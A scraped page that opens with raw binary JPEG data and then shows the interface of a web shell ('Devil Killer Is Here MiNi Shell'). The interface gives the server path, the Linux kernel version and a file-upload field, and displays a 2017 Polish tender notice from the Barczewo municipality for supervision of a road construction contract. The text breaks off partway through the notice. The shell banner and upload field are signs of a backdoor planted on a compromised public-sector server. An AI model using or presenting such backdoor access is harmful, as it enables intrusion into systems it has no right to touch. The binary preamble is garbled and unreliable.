JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170113/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170113/7464-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://barczewo.bip.net.pl/' target='_blank'>http://barczewo.bip.net.pl/</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 7464 - 2017
              z dnia 2017-01-13 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Barczewo: Nadzór inwestorski nad realizacją zadania pn. Budowa drogi gminnej od drogi powiatowej 1448N przez Nikielkowo i Wójtowo do DK 16<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Budowa drogi gminnej od drogi powiatowej 1448N przez Nikielkowo i Wójtowo do DK 16 ujęta w formule Zintegrowanych Inwestycji Terytorialnych w Regionalnym Programie Operacyjnym Województwa Warmińsko  Mazurskiego na lata 2014  2020 </div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Barczewo, krajowy numer identyfikacyjny
              51074357400000, ul.
              Plac Ratuszowy 
              1,
              11010  
              Barczewo, woj.
              warmińsko-mazurskie, państwo
              Polska, tel.
              895 148 664, e-mail
              darek.b@barczewo.pl, faks
              .
              <br />
              Adres strony internetowej (URL): http://barczewo.bip.net.pl/<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://barczewo.bip.net.pl/</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://barczewo.bip.net.pl/</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Ofertę należy złożyć w formie pisemnej w siedzibie zamawiającego (pokój nr 1-Biuro Obsługi Interesanta) lub przesłać na <br />
                Adres:
                <br />Gmina Barczewo, Plac Ratuszowy 1, 11-010 Barczewo</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Nadzór inwestorski nad realizacją zadania pn. Budowa drogi gminnej od drogi powiatowej 1448N przez Nikielkowo i Wójtowo do DK 16<br /><b>Numer referencyjny: </b>BIOŚ.271.2.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>3.1.	Przedmiotem zamówienia jest pełnienie usługi nadzoru inwestorskiego nad realizacją  zadania pn. Budowa drogi gminnej od drogi powiatowej nr 1448N przez Nikielkowo                  i Wójtowo do DK 16. Wykonawca zobowiązany jest do realizacji przedmiotu umowy zgodnie z zapisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2016 r., poz. 290) i aktami wykonawczymi do tej ustawy, projektami budowlanymi do decyzji pozwolenia na budowę nr Bwo/96/2011 z dnia 20 czerwca 2011 r. i nr Bwo/119/2011 z dnia 18 sierpnia 2011 r.
Obowiązki Wykonawcy:
1)	w obszarze spraw ogólnych, wstępnych i organizacyjnych:
a)	wykonywanie swoich usług zgodnie z postanowieniami umowy,                               z zachowaniem należytej staranności wymaganej jak od profesjonalisty, kierując się interesem Zamawiającego i obowiązującymi przepisami prawa oraz zgodnie z przyjętymi zasadami wiedzy technicznej i inżynierskiej, zamówień publicznych, ekonomicznej, prawniczej które dotyczą przedmiotu umowy; 
b)	pełnienie usług nadzoru inwestorskiego zgodnie z warunkami określonymi                   w niniejszej umowie, zgodnie z przepisami polskiego prawa i postanowieniami odpowiednich pozwoleń na prowadzenie budowy;
c)	wykonywanie swoich obowiązków i uprawnień rozpatrując sytuacje zaistniałe     w trakcie realizacji robót, biorąc pod uwagę wszystkie istotne okoliczności, aktywnie i kompetentnie działając na rzecz prawidłowego wykonania realizowanej inwestycji;
d)	wykonywanie swoich obowiązków oraz uprawnień za pomocą personelu posiadającego odpowiednią wiedzę oraz doświadczenie w zagadnieniach związanych z realizacją inwestycji, jak również, w przypadku gdy prawo tego wymaga, posiadającego stosowane uprawnienia, zezwolenia itd., których posiadanie zostanie potwierdzone właściwymi dokumentami;
e)	przestrzeganie i stosowanie się do obowiązujących przepisów prawa oraz zabezpieczenie przestrzegania i stosowania się do przepisów przez personel Wykonawcy; Wykonawca przejmie na siebie i jednocześnie zwolni Zamawiającego z jakichkolwiek roszczeń i postępowań wynikających                    z jakichkolwiek naruszeń takich przepisów przez Wykonawcę lub jego personel;
f)	wsparcie Zamawiającego w czynnościach technicznych, administracyjnych, prawnych oraz finansowych związanych z realizacją inwestycji;
g)	ochrona interesów Zamawiającego, zawsze tam gdzie będzie to stosowne oraz nie pozostanie w sprzeczności z umową zawartą z Zamawiającym lub etyką zawodową;
h)	działanie zawsze w sposób lojalny i bezstronny, jako sumienny doradca Zamawiającego, z najwyższą starannością, zgodnie z przepisami oraz                           z zasadami postępowania obowiązującymi w jego zawodzie;
i)	doradztwo we wszystkich sprawach związanych z przygotowaniem oraz wykonywaniem inwestycji oraz wyrażanie opinii w razie konieczności;
j)	powstrzymywanie się od wszelkich publicznych oświadczeń dotyczących umowy bez uzyskania wcześniejszej zgody Zamawiającego, jak również od angażowania się w jakąkolwiek działalność pozostającą w konflikcie ze zobowiązaniami wobec Zamawiającego wynikającymi z niniejszej umowy;
k)	z zastrzeżeniem uprzedniej pisemnej zgody Zamawiającego, Wykonawcy nie wolno wykonywać jakichkolwiek czynności na rzecz bądź w imieniu wykonawców robót budowlanych na inwestycji; 
l)	Wykonawca nie może zaciągać żadnych zobowiązań finansowych w imieniu Zamawiającego z zastrzeżeniem odmiennych pisemnych pod rygorem nieważności ustaleń stron. Jeśli jakakolwiek czynność Wykonawcy, która ma być wykonana w ramach Umowy może w jego ocenie doprowadzić do powstania zobowiązania finansowego po stronie Zamawiającego, Wykonawca zobowiązany jest powiadomić o tym fakcie pisemne Zamawiającego przed wykonanie takiej/takich czynności;
m)	wszelkie dokumenty i informacje otrzymane przez Wykonawcę w związku                   z umową nie będą, za wyjątkiem przypadków, gdy będzie to konieczne dla celów wykonania umowy, publikowane lub ujawniane przez Wykonawcę bez uzasadnionej pisemnej zgody Zamawiającego;
n)	Wykonawca oraz jego personel zachowają tajemnicę zawodowa przez cały okres trwania umowy oraz po jej zakończeniu. W związku z tym Wykonawca, jak i zatrudniony lub zaangażowany przez niego personel nie będą przekazywać ani rozpowszechniać osobom trzecim informacji uzyskanych w związku z wykonywaniem umowy chyba, że uzyskają na to uprzednią pisemną zgodę Zamawiającego. Ponadto nie będą oni wykorzystywać poza celem określonym  w umowie ze szkodą dla Zamawiającego żadnych przekazanych im informacji oraz wyników opracowań, prób i badań przeprowadzonych w trakcie i w celu wykonania umowy;
o)	wydanie lub udostępnienie, na każde żądanie Zamawiającego, wszelkich dokumentów związanych z realizacją umowy;      
2)	w obszarze nadzoru nad wykonywaniem robót budowlanych:
a)	pełnienie wszelkich czynności wielobranżowego nadzoru inwestorskiego,                  w imieniu i na rzecz Zamawiającego, w zakresie wynikającym z dokumentacji projektowej oraz innych dokumentów związanych z realizacją i finansowaniem inwestycji, w sposób zapewniający bardzo dobrą jakość wykonawstwa, zgodnie z powszechnie obowiązującymi przepisami prawa, w tym art. 25, 26 i 27 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2016r. poz. 290);
b)	ustanowienie zespołu inspektorów nadzoru inwestorskiego;
c)	udział w przekazaniu terenu budowy;
d)	sprawowanie nadzoru nad wykonaniem budowy zgodnie z dokumentacją projektową i obowiązującymi przepisami;
e)	ustalenia harmonogramu rzeczowo-finansowego pracy Inspektorów nadzoru inwestorskiego;
f)	obowiązki inspektora nadzoru inwestorskiego:
	przybycie na plac budowy w czasie 3 godzin od zgłoszenia w formie telefonicznej/pisemnej/elektronicznej takiego obowiązku przybycia przez Zamawiającego;
	dokumentowanie prac w postaci dokumentów roboczych, dokumentów zawierających istotne kwestie oraz notatek służbowych;
	prowadzenie pełnej dokumentacji wszystkich rad budowy, organizowanych nie rzadziej niż raz w miesiącu lub częściej w zależności od potrzeb oraz spotkań i narad, w których uczestniczy lub które prowadzi Wykonawca                     w tym w szczególności sporządzanie protokołów z narad oraz przekazywanie ich Zamawiającemu i wykonawcy robót budowlanych w terminie 7 dni roboczych od dnia narady;
	sporządzanie raportów miesięcznych z postępu robót uwzględniających zaawansowanie finansowe na dany miesiąc. Raporty za miesiąc poprzedni powinny zostać złożone do każdego 10 dnia każdego m-ca. Dokumenty, raporty oraz korespondencje opracowywane przez Wykonawcę powinny być przez niego przedstawiane Zamawiającemu oraz wykonawcy robót budowlanych;
	przygotowanie i przedłożenie zamawiającemu do uzgodnienia Organizację i metodologię nadzoru inwestorskiego, opisującą przede wszystkim zasady obiegu dokumentów oraz inne niezbędne wytyczne, według których mają postępować uczestnicy procesu realizacji inwestycji. W tym także, zaproponowanie i uzgodnienie z Zamawiającym wzorów wszystkich wymaganych raportów z postępu i stanu realizacji prac, raportów inspekcyjnych, protokołów odbiorów częściowych i końcowego, protokołów prób eksploatacyjnych oraz innych dokumentów mających być w użyciu                 w ramach realizacji inwestycji;
	przygotowanie i przedłożenie Zamawiającemu do uzgodnienia i akceptacji Zasad Kontroli Jakości przez Wykonawcę, jakie stosować będzie Wykonawca i jego personel wobec wykonawcy robót budowlanych;
	wykonywanie również innych obowiązków, których wykonanie należy zakwalifikować jako obowiązki Inspektora nadzoru inwestorskiego;
3)	w obszarze nadzoru nad realizacją inwestycji:
a)	Wykonawca i jego personel są przedstawicielami Zamawiającego na budowie, upoważnionymi do podejmowania decyzji dotyczących zagadnień technicznych i ekonomicznych tej budowy w ramach dokumentacji projektowej, przepisów Prawa budowlanego oraz umowy o jej realizację                     w ścisłym porozumieniu z Zamawiającym;
b)	nadzór nad robotami sprawowany będzie na podstawie oświadczeń Inspektorów nadzoru inwestorskiego o przyjęciu obowiązków, w zakresie odpowiadającym poniższym wymaganiom, zgodnie z zawartą pomiędzy stronami umową oraz przepisami Prawa budowlanego i sztuką budowlaną;
c)	funkcja inspektora nadzoru rozpoczyna się z chwilą złożenia przez niego oświadczenia o podjęciu nadzoru inwestorskiego nad budową;
d)	obowiązki Wykonawcy wygasają dopiero po ostatniej kontroli projektu i udzieleniu wyjaśnień kontrolującym, o ile wystąpi taka potrzeba;
e)	w razie odbioru przedmiotu umowy z wadami nadającymi się do usunięcia, obowiązki Inspektorów nadzoru inwestorskiego wygasają po protokolarnym stwierdzeniu usunięcia tych wad;
f)	Wykonawca będzie miał obowiązek uczestniczyć, w ramach otrzymanego wynagrodzenia, w czynnościach związanych z ujawnieniem oraz kontrolą usunięcia przez wykonawcę robót budowlanych, wad stwierdzonych w okresie trwania gwarancji i rękojmi na wykonane roboty budowlane oraz dostarczone materiały;
g)	obowiązkiem Wykonawcy i jego personelu jest dokonanie odpowiedniego wpisu w dzienniku budowy o objęciu funkcji Inspektora nadzoru inwestorskiego, jak również wszelkich zmian w sprawowaniu tej funkcji i czynności w toku realizacji budowy;
h)	Wykonawca zobowiązany będzie do akceptowania umów wykonawcy robót budowlanych z podwykonawcami i dalszymi podwykonawcami oraz do informowania Zamawiającego o obecności niezgłoszonych podwykonawców i dalszych podwykonawców na budowie w ciągu 2 dni od powzięcia informacji o obecności niezgłoszonych podwykonawców i dalszych podwykonawców;
i)	Wykonawca zobowiązany będzie monitorować postępy w realizacji oraz stan realizacji zadania i ich zgodność z zatwierdzoną dokumentacją projektową, zezwoleniami na realizację inwestycji, zatwierdzonymi przez Zamawiającego, harmonogramami rzeczowo-finansowymi, ofertą wykonawcy robót budowlanych oraz obowiązującymi przepisami i zasadami wiedzy technicznej. W tym także identyfikować na bieżąco potencjalne ryzyka, zagrożenia i obszary problemowe oraz podejmować odpowiednie środki zaradcze, a także informować zamawiającego w przypadku zaistnienia przeszkód i zakłóceń                     w realizacji inwestycji, które mogą spowodować opóźnienie lub mieć inne niekorzystne konsekwencje na realizację inwestycji;
4)	w obszarze  realizacji budowy: 
a)	prowadzenia regularnych inspekcji na terenie budowy w celu sprawdzania jakości wykonywanych robót oraz wbudowywanych materiałów, zgodnie                     z wymaganiami dokumentacji projektowej oraz praktyki inżynierskiej;
b)	kontrolowania przestrzegania przez wykonawcę robót budowlanych zasad bezpieczeństwa pracy i utrzymania porządku na terenie budowy;
c)	kontrolowania zgodności oznakowania robót z zatwierdzonym projektem czasowej organizacji ruchu;
d)	organizowania oraz przewodniczenia naradom technicznym dotyczącym postępu robót (rady budowy), w których udział biorą przedstawiciele wszystkich stron zaangażowanych w realizację budowy (wykonawca robót budowlanych, Kierownik budowy, Zamawiający, autorzy dokumentacji projektowej oraz inni oficjalni obserwatorzy) raz na miesiąc;
e)	kontroli jakości robót, wbudowanych elementów i stosowanych materiałów                 w celu stwierdzenia zgodności z dokumentacją projektową, zgodności robót z warunkami zezwolenia na realizację inwestycji drogowej, przepisami techniczno-budowlanymi, zasadami bezpieczeństwa obiektu w toku budowy i przyszłego użytkownika oraz z zasadami współczesnej wiedzy technicznej;
f)	kontroli zgodności wykonywanych robót z dokumentacją projektową oraz umową;
g)	kontroli ilości i wartości wykonywanych robót przed odbiorem końcowym zakończonego przedmiotu umowy;
h)	kontroli prawidłowości zafakturowania wykonanych robót;
i)	kontroli prawidłowości prowadzenia dziennika budowy i dokonywania w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla oceny właściwego wykonania robót;
j)	Wykonawca powinien nadzorować budowę (roboty budowlane) w takich odstępach czasu, aby zapewniona była skuteczność nadzoru oraz zależnie od potrzeb Wykonawcy i Zamawiającego;
k)	dokonywania bieżącego przeglądu dziennika budowy, potwierdzając swoją obecność i dokonane czynności stosownym zapisem podczas każdorazowego pobytu na budowie;
l)	Inspektorzy nadzoru inwestorskiego mają prawo dokonywania zapisów                      w dzienniku budowy wyłącznie w zakresie powierzonych im czynności nadzoru;
m)	sprawdzenia posiadanych przez Kierownika budowy odpowiednich dokumentów (atestów, świadectw jakości, wyników badań) dotyczących dostarczanych materiałów i innych wyrobów w zakresie zgodności                              z dokumentacją projektową;
n)	czuwania nad przestrzeganiem zakazu wbudowywania materiałów i wyrobów niezgodnych z dokumentacją projektową, specyfikacją, nie dopuszczonych do stosowania w budownictwie;
o)	w razie stwierdzenia niezgodności wykonywania robót budowlanych                          z dokumentacją projektową, nieprawidłowości procesów technologicznych, użycia niewłaściwych materiałów, wad w wykonywaniu lub prowadzeniu robót w sposób powodujący podwyższenie kosztów budowy bądź mogących narazić Zamawiającego na straty, Wykonawca zwraca na to uwagę Kierownikowi budowy i w porozumieniu z Zamawiającym podejmuje odpowiednie decyzje, które wpisuje do dziennika budowy wyznaczając termin ich wykonania, zawiadamiając o tym pisemnie Zamawiającego i wykonawcę robót budowlanych;
p)	sprawdzania robót ulegających zakryciu lub zanikających najpóźniej w ciągu 3 dni roboczych po zgłoszeniu ich przez Kierownika budowy zapisem                          w dzienniku budowy;
q)	żądania dokonania przez wykonawcę robót budowlanych, na jego koszt, odkrywek elementów robót budzących wątpliwości w celu sprawdzenia jakości ich wykonania, jeżeli wykonanie tych robót nie zostało zgłoszone do sprawdzenia przed ich zakryciem, a także dokonania prób niszczących wykonanych robót (odkucia, wycinki);
r)	stwierdzenia wykonania przez służbę geodezyjną powykonawczych pomiarów inwentaryzacyjnych, a także sprawdzenia zgodności usytuowania obiektów z projektem technicznym. Wykonanie tych czynności Wykonawca oraz Inspektorzy nadzoru stwierdzają zapisem w dzienniku budowy;
s)	weryfikowania i sprawdzania wszelkich dokumentów stanowiących podstawę do wystawiania przez wykonawcę robót budowlanych faktury końcowej w zakresie określonym w umowie zawartej przez Zamawiającego i wykonawcę robót budowlanych. Podstawą wystawiania faktury końcowej będzie Protokół odbioru robót podpisany i sprawdzony przez Wykonawcę i jego personel oraz przedstawicieli Zamawiającego, jak również kompletności wszystkich niezbędnych dokumentów;
t)	załączone do odbiorów dokumenty winny być sprawdzone i podpisane przez: Wykonawcę i Inspektorów nadzoru inwestorskiego oraz Kierownika budowy;
u)	rozstrzygania wątpliwości natury technicznej powstałe w toku wykonywania robót w porozumieniu z Kierownikiem budowy, zasięgając w razie potrzeby opinii autora projektu bądź rzeczoznawców;
v)	uczestniczenia w przeprowadzonych przez wykonawcę robót budowlanych próbach oraz odbiorach technicznych instalacji i urządzeń, a także w komisjach technicznych powoływanych do oceny lub rozstrzygnięcia technicznych spraw budowy w toku jej realizacji;
w)	wyegzekwowania od wykonawcy robót budowlanych wszystkich dokumentów niezbędnych do zakończenia robót i ich sprawdzenia;
x)	kontrolowanie, aby wprowadzone zmiany i uzupełnienia dokumentacji projektowej nie powodowały zmian w realizacji inwestycji na niekorzyść zamawiającego;
5)	w obszarze odbioru robót:
a)	po zakończeniu robót oraz po wykonaniu przewidzianych w odrębnych przepisach i umowie prób oraz sprawdzeń Wykonawca potwierdza                                        w dzienniku budowy zapis Kierownika budowy o gotowości do odbioru oraz należyte uporządkowanie terenu budowy;
b)	przygotowania we współdziałaniu z pozostałymi uczestnikami procesu inwestycyjnego materiałów, które są niezbędne do rozliczenia wykonanych robót i oceny osiągniętych efektów rzeczowych w okresie przygotowania inwestycji do odbioru;
c)	sprawdzenia kompletności przedstawionych przez wykonawcę robót budowlanych dokumentów i zaświadczeń niezbędnych do przeprowadzenia odbioru;
d)	uczestniczenia w czynnościach odbioru;
e)	przejęcia od Kierownika budowy dokumentacji powykonawczej i dziennika budowy, jak również kompletnej dokumentacji prób i sprawdzeń, oraz wszelkich dokumentów niezbędnych do przeprowadzenia odbioru końcowego oraz uzyskania pozwolenia na użytkowanie obiektu (zawiadomienia o zakończeniu robót budowlanych);
6)	Wykonawca ma obowiązek realizować wszystkie inne polecenia i zarządzenia Zamawiającego, nie wymienione powyżej, które będą niezbędne i będą służyły prawidłowej realizacji umowy i będą służyły zabezpieczeniu interesów Zamawiającego;  
7)	w okresie trwania gwarancji i rękojmi wykonanych robót budowlanych i dostarczonych materiałów Wykonawca, w ramach otrzymanego wynagrodzenia, przeprowadzał będzie co najmniej raz na rok  a w przypadku stwierdzenia usterek każdorazowo na pisemne żądanie Zamawiającego  przeglądy gwarancyjne oraz sporządzał pisemne raporty dla Zamawiającego. 
8)	W przypadku zaistnienia okoliczności przeprowadzenia inwentaryzacji robót przedmiotowej inwestycji, Wykonawca bierze udział w komisji inwentaryzacji robót  w celu określenia zakresu robót wykonanych (do wykonania). 







 

<br /><br /><b>II.5) Główny kod CPV: </b>71247000-1<br /><b> Dodatkowe kody CPV:</b>71248000-8,
                71520000-9,
                71631300-3,
                71310000-4,
                <br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
